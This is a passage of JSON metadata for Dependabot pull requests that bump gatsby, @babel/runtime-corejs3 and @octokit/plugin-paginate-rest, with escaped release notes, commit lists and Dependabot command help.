Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: pin cheerio (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/39066\"\u003e#39066\u003c/a\u003e) by \u003ca href=\"https://github.com/gatsbybot\"\u003e\u003ccode\u003e@​gatsbybot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/pull/39069\"\u003egatsbyjs/gatsby#39069\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSee full release notes: \u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/pull/39070\"\u003egatsbyjs/gatsby#39070\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.24\u003c/h2\u003e\n\u003cp\u003eWelcome to \u003ccode\u003egatsby@4.24.0\u003c/code\u003e release (September 2022 #\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e2)\u003c/p\u003e\n\u003cp\u003eKey highlights of this release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.24/#gatsby-5-alpha\"\u003eGatsby 5 Alpha\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.24/#updating-file-system-routes-on-data-changes\"\u003eUpdating File System Routes on data changes\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBleeding Edge\u003c/strong\u003e: Want to try new features as soon as possible? Install \u003ccode\u003egatsby@next\u003c/code\u003e and let us know if you have any \u003ca href=\"https://github.com/gatsbyjs/gatsby/issues\"\u003eissues\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://www.gatsbyjs.com/docs/reference/release-notes/v4.23\"\u003ePrevious release notes\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/compare/gatsby@4.24.0-next.0...gatsby@4.24.0\"\u003eFull changelog\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/abb258b1608d39bc5fd524938411f41326799e55\"\u003e\u003ccode\u003eabb258b\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/1b0b559b0c06735c5670998271b378d7c0629555\"\u003e\u003ccode\u003e1b0b559\u003c/code\u003e\u003c/a\u003e chore: pin \u003ccode\u003e@​vercel/webpack-asset-relocator-loader\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38981\"\u003e#38981\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38983\"\u003e#38983\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/a115f9271ce046f2c9857b6c116c1ecdb6b3e876\"\u003e\u003ccode\u003ea115f92\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/5ea513c7041e65039b3d3dedb0b1b664cd7b9565\"\u003e\u003ccode\u003e5ea513c\u003c/code\u003e\u003c/a\u003e fix(gatsby): Restore asset, path prefix for file-loader handled files (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38764\"\u003e#38764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/8a80e16b7fb4c0827b025db4c2472039a2de8eaa\"\u003e\u003ccode\u003e8a80e16\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/7e1cfdb457a2f7316542897e8a2bca2e39451dfd\"\u003e\u003ccode\u003e7e1cfdb\u003c/code\u003e\u003c/a\u003e fix(gatsby-source-wordpress): allow using engines when using wordpress auth (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/db5eb186008c62acb78cf66ae50fd7e1f0d67626\"\u003e\u003ccode\u003edb5eb18\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/fc22f4ba3ad7ca5fb3592f38f4f0ca8ae60b4bf7\"\u003e\u003ccode\u003efc22f4b\u003c/code\u003e\u003c/a\u003e fix(gatsby): don't serve codeframes for files outside of compilation (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/38059\"\u003e#38059\u003c/a\u003e)...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/8889bfe5271985d19c956dff7f567be86ef2f3df\"\u003e\u003ccode\u003e8889bfe\u003c/code\u003e\u003c/a\u003e chore(release): Publish\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gatsbyjs/gatsby/commit/d3d5fd07496411453ab5d8caf869f5a66a18b4f6\"\u003e\u003ccode\u003ed3d5fd0\u003c/code\u003e\u003c/a\u003e fix(gatsby-source-wordpress): prevent inconsistent schema customization (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/377\"\u003e#377\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/gatsbyjs/gatsby/compare/gatsby@4.23.1...gatsby@4.25.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/runtime-corejs3` from 7.13.9 to 7.29.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/runtime-corejs3\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.1 (2026-02-04)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17771\"\u003e#17771\u003c/a\u003e [7.x backport] fix: ensure \u003ccode\u003etargets.esmodules\u003c/code\u003e is validated (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17776\"\u003e#17776\u003c/a\u003e [7.x backport] Fix undefined when 64 indents (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/37d5595fca9f188f0534458180611f2e776acd31\"\u003e\u003ccode\u003e37d5595\u003c/code\u003e\u003c/a\u003e v7.29.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/1c0a08d95ae7e1c788c7e1ae3a10ee53f7c86864\"\u003e\u003ccode\u003e1c0a08d\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Properly handle await in finally (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17805\"\u003e#17805\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/68e157771568abc3ba8b2775caf7618cd9692ae5\"\u003e\u003ccode\u003e68e1577\u003c/code\u003e\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17642\"\u003e#17642\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/35055e392079a65830b7bf5b1d1c1fc4de90a78f\"\u003e\u003ccode\u003e35055e3\u003c/code\u003e\u003c/a\u003e v7.28.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/18d88b83c67c8dbbe63e4ac423e6006c4c01b85c\"\u003e\u003ccode\u003e18d88b8\u003c/code\u003e\u003c/a\u003e Improve \u003ccode\u003e@​babel/core\u003c/code\u003e typings (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3/issues/17471\"\u003e#17471\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/ef155f5ca83c73dbc1ea8d95216830b7dc3b0ac2\"\u003e\u003ccode\u003eef155f5\u003c/code\u003e\u003c/a\u003e v7.28.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/cac0ff4c3426eed30b4d27e7971b348da7c9f1e6\"\u003e\u003ccode\u003ecac0ff4\u003c/code\u003e\u003c/a\u003e v7.28.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commi...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"}},{"old_version":"9.1.2","new_version":"9.2.2","update_type":"minor","path":null,"pr_created_at":"2026-03-17T11:59:57.000Z","version_change":"9.1.2 → 9.2.2","issue":{"uuid":"4088095634","node_id":"PR_kwDOKoENhM7LNEnS","number":4,"state":"closed","title":"Bump @octokit/plugin-paginate-rest from 9.1.2 to 9.2.2","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-17T14:31:28.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-17T11:59:57.000Z","updated_at":"2026-03-17T14:31:30.000Z","time_to_close":9091,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.2","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"}],"path":null,"ecosystem":"npm"},"body":"Bumps [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) from 9.1.2 to 9.2.2.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.4...v9.1.5\"\u003e9.1.5\u003c/a\u003e (2023-12-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebump octokit/types minor version (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/581\"\u003e#581\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/65baec44474875a48ff20c22e109f1a574421dc5\"\u003e65baec4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.3...v9.1.4\"\u003e9.1.4\u003c/a\u003e (2023-11-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/575\"\u003e#575\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/27db9ae012528921725d929af43111469faff901\"\u003e27db9ae\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.1.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.2...v9.1.3\"\u003e9.1.3\u003c/a\u003e (2023-11-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/574\"\u003e#574\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0940cb70e4f7ae86c80f6101c01f2699076bd363\"\u003e0940cb7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.2...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@octokit/plugin-paginate-rest\u0026package-manager=npm_and_yarn\u0026previous-version=9.1.2\u0026new-version=9.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and 